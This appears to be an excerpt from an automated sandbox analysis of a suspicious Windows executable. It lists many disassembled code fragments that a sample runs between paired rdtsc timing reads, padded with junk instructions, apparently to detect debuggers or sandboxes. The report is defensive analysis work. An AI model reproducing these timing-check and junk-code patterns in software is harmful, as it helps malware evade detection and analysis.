                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D573DB second address: D5740E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007FD288CC4A66h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D25BDh], ebx 0x00000013 push 0000001Eh 0x00000015 sbb edx, 78DD2F00h 0x0000001b nop 0x0000001c push edx 0x0000001d pushad 0x0000001e push esi 0x0000001f pop esi 0x00000020 js 00007FD288CC4A66h 0x00000026 popad 0x00000027 pop edx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jo 00007FD288CC4A66h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5740E second address: D57412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57412 second address: D57418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5751A second address: D57533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57533 second address: D57539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D576FE second address: D57708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD2884F85C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57708 second address: D5777B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or edi, 45B11622h 0x00000011 lea eax, dword ptr [ebp+1247B386h] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FD288CC4A68h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17F4h], eax 0x00000037 jmp 00007FD288CC4A6Dh 0x0000003c mov ecx, dword ptr [ebp+122D25D2h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jns 00007FD288CC4A7Bh 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5777B second address: D57780 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57780 second address: D57817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FD288CC4A68h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 call 00007FD288CC4A79h 0x00000029 xor ecx, dword ptr [ebp+122D3823h] 0x0000002f pop edi 0x00000030 sub dword ptr [ebp+122D27B3h], esi 0x00000036 mov dword ptr [ebp+122D2813h], edi 0x0000003c lea eax, dword ptr [ebp+1247B342h] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FD288CC4A68h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c mov edx, dword ptr [ebp+122D25C2h] 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jg 00007FD288CC4A66h 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57817 second address: D57821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD2884F85C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57821 second address: D57859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007FD288CC4A68h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD288CC4A79h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57859 second address: D3BB46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c and edx, 69FCD3F8h 0x00000012 call dword ptr [ebp+122D56D4h] 0x00000018 push ecx 0x00000019 jmp 00007FD2884F85D3h 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AC90 second address: D9AC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 js 00007FD288CC4A6Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9ADEB second address: D9ADF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B0E1 second address: D9B0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B0E5 second address: D9B10C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D3h 0x00000007 je 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007FD2884F85DDh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B10C second address: D9B126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A71h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B276 second address: D9B2A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jmp 00007FD2884F85D6h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FD2884F85D2h 0x00000015 jc 00007FD2884F85C6h 0x0000001b jc 00007FD2884F85C6h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA26D3 second address: DA26D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1249 second address: DA1291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CBh 0x00000009 jnp 00007FD2884F85C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2884F85D8h 0x00000017 jmp 00007FD2884F85D8h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA142F second address: DA1439 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD288CC4A72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1439 second address: DA143F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA171C second address: DA172B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA19FF second address: DA1A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1B6D second address: DA1B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD288CC4A6Bh 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E0A second address: DA0E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E10 second address: DA0E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E14 second address: DA0E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jnp 00007FD2884F85C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E28 second address: DA0E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007FD288CC4A6Ch 0x0000000b jno 00007FD288CC4A66h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5054 second address: DA5058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5058 second address: DA505E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA505E second address: DA5068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD2884F85C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5068 second address: DA5095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FD288CC4A6Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C1D second address: DA4C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C22 second address: DA4C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD288CC4A66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C31 second address: DA4C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C37 second address: DA4C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4DCD second address: DA4DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4DD3 second address: DA4DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA81A7 second address: DA81CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jp 00007FD2884F85C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A7F second address: DA7A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A83 second address: DA7A93 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7C05 second address: DA7C40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD288CC4A79h 0x0000000e jne 00007FD288CC4A6Ch 0x00000014 jnc 00007FD288CC4A66h 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7C40 second address: DA7C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7F06 second address: DA7F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEB5 second address: DACEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEB9 second address: DACED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A75h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACED2 second address: DACEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEDD second address: DACEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A75h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEF7 second address: DACF02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD2884F85C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF02 second address: DACF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A77h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF21 second address: DACF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85D7h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD2884F85D1h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD20D second address: DAD212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB18B7 second address: DB18D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85D4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0AEE second address: DB0AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0AF3 second address: DB0B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2884F85CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB10ED second address: DB10F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB13C7 second address: DB13F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85D0h 0x00000009 jmp 00007FD2884F85D4h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB13F4 second address: DB13FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7569 second address: DB7589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jne 00007FD2884F85C6h 0x00000010 jmp 00007FD2884F85CEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7589 second address: DB7599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FD288CC4A66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5ED1 second address: DB5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CBh 0x00000009 jmp 00007FD2884F85D8h 0x0000000e popad 0x0000000f jmp 00007FD2884F85D7h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB621D second address: DB6235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB64DC second address: DB64E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB64E6 second address: DB64F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB64F0 second address: DB64F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB668C second address: DB6691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6691 second address: DB66A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB66A6 second address: DB66B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD288CC4A66h 0x0000000a jnp 00007FD288CC4A66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB67F7 second address: DB680B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB69CE second address: DB69D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB69D6 second address: DB69E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD2884F85C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB69E2 second address: DB69E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBE64E second address: DBE661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD2884F85CDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBE661 second address: DBE682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD288CC4A72h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEA75 second address: DBEA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEA7F second address: DBEA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEE06 second address: DBEE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEE0A second address: DBEE0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEE0E second address: DBEE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD2884F85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBEE1A second address: DBEE1F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF138 second address: DBF161 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D7h 0x00000007 jo 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FD2884F85C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF161 second address: DBF165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF165 second address: DBF173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF48E second address: DBF492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF492 second address: DBF4AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CBh 0x00000007 jo 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF4AC second address: DBF4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jo 00007FD288CC4A66h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FD288CC4A66h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFC98 second address: DBFC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3696 second address: DC36A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007FD288CC4A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC36A5 second address: DC36AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC36AA second address: DC36B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC36B0 second address: DC36B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
